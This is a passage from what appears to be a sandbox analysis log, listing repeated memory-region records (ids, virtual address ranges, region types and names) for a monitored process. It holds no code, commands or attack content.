"pagefile_0x0000000000ce0000" filename = "" Region: id = 8234 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8235 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8236 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8237 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8238 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8239 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8240 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8241 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8242 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8243 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8244 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8245 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8246 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8247 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8248 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8249 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8250 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8251 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8252 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8253 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8254 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8255 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8256 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8257 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8258 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8259 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8260 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8261 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8262 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8263 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8264 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8265 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8266 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8267 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8268 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8269 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8270 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8271 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8272 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8273 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8274 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8275 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8276 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8277 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8278 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8279 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8280 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8281 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8282 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8283 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8284 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8285 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8286 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8287 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8288 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8289 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8290 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8291 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8292 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8293 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8294 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8295 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8296 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8297 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8298 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8299 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8300 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8301 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8302 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8303 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8304 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8305 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8306 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8307 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8308 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8309 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8310 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8311 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8312 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8313 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8314 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8315 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8316 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8317 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8318 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8319 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8320 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8321 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8322 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8323 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8324 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8325 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8326 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8327 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8328 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8329 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8330 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8331 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8332 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8333 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8334 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8335 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8336 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8337 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8338 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8339 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8340 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8341 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8342 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8343 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8344 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8345 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8346 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8347 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8348 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8349 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8350 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8351 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8352 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8353 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8354 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8355 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8356 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8357 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8358 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8359 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8360 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8361 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8362 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8363 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8364 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8365 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8366 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8367 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8368 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8369 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8370 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8371 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8372 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8373 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8374 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8375 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8376 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8377 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8378 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8379 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8380 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8381 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8382 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8383 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8384 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8385 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8386 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8387 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8388 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8389 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8390 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8391 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8392 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8393 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8394 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8395 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8396 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8397 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8398 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8399 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8400 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8411 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8412 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8413 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8414 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8415 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8416 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8417 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8418 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8419 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8420 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8421 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8422 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8423 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8424 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8425 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8426 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8427 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8428 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8429 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8430 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8431 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8432 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 